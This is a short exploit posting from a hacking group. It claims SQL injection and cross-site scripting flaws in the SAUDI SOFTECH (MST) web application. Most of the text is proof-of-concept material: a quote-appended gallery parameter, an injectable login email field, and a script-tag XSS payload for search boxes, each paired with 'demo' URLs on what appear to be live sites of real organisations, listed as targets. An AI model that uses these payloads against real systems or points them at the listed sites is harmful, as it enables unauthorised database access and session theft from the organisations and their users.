###################### # Exploit Title : SAUDI SOFTECH (MST) - SQL Injection / Cross Site Scripting # Exploit Author : Persian Hack Team # Vendor Homepage : http://www.saudisoftech.com/ # Category: [ Webapps ] # Tested on: [ Win ] # Date: 2016/06/05 # Version : V.5.0.1 ###################### # # PoC: # 1-1-Get SQL Injection # Demo : # http://www.saudiacademy.edu.sa/gallery.php?gid=4%27 # http://www.zamilshipyard.com/gallery.php?gid=2%27 # # 1-2-Post SQL Injection # email Parameter in Login page vulnerable # Demo: # http://www.zamilshipyard.com/panel/index.php # # 2-Cross Site Scripting # Search Box vulnerable to XSS # Payload = <ScRiPt >prompt("Persian Hack Team")</ScRiPt> # Demo : # http://www.btech-sa.com/search.php # http://www.speetech.net/search.php # http://www.madicc.org/search.php # ###################### # Discovered by : Mojtaba MobhaM & T3NZOG4N & FireKernel # Greetz : Milad Hacking & JOK3R & All Iranian Hackers And All Persian Hack Team Members # Homepage : persian-team.ir ######################